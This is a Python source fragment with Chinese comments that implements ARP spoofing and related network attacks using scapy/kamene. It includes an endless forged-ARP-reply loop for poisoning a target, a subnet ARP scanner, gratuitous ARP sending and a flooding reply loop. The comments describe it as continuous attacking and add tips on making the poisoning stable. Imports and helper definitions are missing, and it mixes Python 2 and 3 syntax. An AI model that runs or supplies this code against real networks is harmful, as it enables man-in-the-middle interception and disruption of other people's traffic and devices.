def arp_spoof(ip_1, ip_2, ifname='Net1'):
global localip, localmac, ip_1_mac, ip_2_mac, g_ip_1, g_ip_2, g_ifname # 申明全局变量
g_ip_1 = ip_1 # 为全局变量赋值,g_ip_1为被毒化ARP设备的IP地址
g_ip_2 = ip_2 # 为全局变量赋值,g_ip_2为本机伪装设备的IP地址
g_ifname = ifname # 为全局变量赋值,攻击使用的接口名字
# 获取本机IP地址,并且赋值到全局变量localip
localip = get_ip_address(ifname)
# 获取本机MAC地址,并且赋值到全局变量localmac
localmac = get_mac_address(ifname)
# 获取ip_1的真实MAC地址
ip_1_mac = arp_request(ip_1, ifname)[1]
# 获取ip_2的真实MAC地址
ip_2_mac = arp_request(ip_2, ifname)[1]
# 引入信号处理机制,如果出现ctl+c(signal.SIGINT),使用sigint_handler这个方法进行处理
signal.signal(signal.SIGINT, sigint_handler)
while True: # 一直攻击,直到ctl+c出现!!!
# op=2,响应ARP
sendp(Ether(src=localmac, dst=ip_1_mac) / ARP(op=2, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1),
iface=kamene_iface(g_ifname),
verbose=False)
# op=1,请求ARP
# sendp(Ether(src=localmac, dst=ip_1_mac)/ARP(op=1, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1), iface = g_ifname, verbose = False)
# 以太网头部的src MAC地址与ARP数据部分的hwsrc MAC不匹配攻击效果相同
# sendp(Ether(src=ip_1_mac, dst=ip_1_mac)/ARP(op=1, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1), iface = g_ifname, verbose = False)
# 如果采用dst为二层广播,会造成被伪装设备告警地址重叠,并且欺骗效果不稳定,容易抖动!
print("发送ARP欺骗数据包!欺骗" + ip_1 + ',本机MAC地址为' + ip_2 + '的MAC地址!!!')
time.sleep(1)
def arp_scan(subnet):
subnetsplit = re.findall('(\d{1,3}\.\d{1,3}\.\d{1,3})', subnet)
ip_list = []
Target = []
for i in range(1, 255):
ipinfo = subnetsplit[0] + '.' + str(i)
ip_list.append(ipinfo)
destip = ip_list
localmac = get_mac_address('bond0')
localip = get_ip_address('bond0')
ifname = 'bond0'
result_raw = srp(Ether(src=localmac, dst='FF:FF:FF:FF:FF:FF') /
ARP(op=1,
hwsrc=localmac,
hwdst='00:00:00:00:00:00',
psrc=localip,
pdst=destip),
iface=ifname,
timeout=1,
verbose=False)
result_list = result_raw[0].res
for i in result_list:
key = i[1][1].fields['psrc'] # 每个元素中找到目标地址
value = i[1][1].fields['hwsrc'] # 每个元素中找到对应的目标IP地址
IPandMAC = [key, value] # 将key,value的两个信息合成一个列表
Target.append(IPandMAC) # append()中只能赋一个值,因此需要上一步
for i in Target:
print 'Target-IP : %s ; Target-MAC : %s' % (i[0], i[1]) # 分别提取IP地址和列表
def gratuitous_arp(ip_address, ifname='ens37'):
localmac = get_mac_address(ifname)
gratuitous_arp_pkt = kamene.all.Ether(
src=localmac, dst='ff:ff:ff:ff:ff:ff'
) / kamene.all.ARP(
op=2, hwsrc=localmac, hwdst=localmac, psrc=ip_address, pdst=ip_address)
kamene.all.sendp(gratuitous_arp_pkt,
iface=scapy_iface(ifname),
verbose=False)
def arp_request(ip_address, ifname='ens33'):
localip = get_ip_address(ifname)
localmac = get_mac_address(ifname)
try:
result_raw = sr1(ARP(op=1,
hwsrc=localmac,
hwdst='00:00:00:00:00:00',
psrc=localip,
pdst=ip_address),
iface=kamene_iface(ifname),
timeout=1,
verbose=False)
return ip_address, result_raw.getlayer(ARP).fields['hwsrc']
except AttributeError:
return ip_address, None
def arp_reply(ip_address):
mac_address = get_mac_address('ens33')
while True: # 一直攻击,直到ctl+c出现!!!
sendp(Ether(dst='ff:ff:ff:ff:ff:ff', src=mac_address) / ARP(op=2, hwsrc=mac_address, hwdst=mac_address, psrc=ip_address, pdst=ip_address), verbose=False)
time.sleep(1)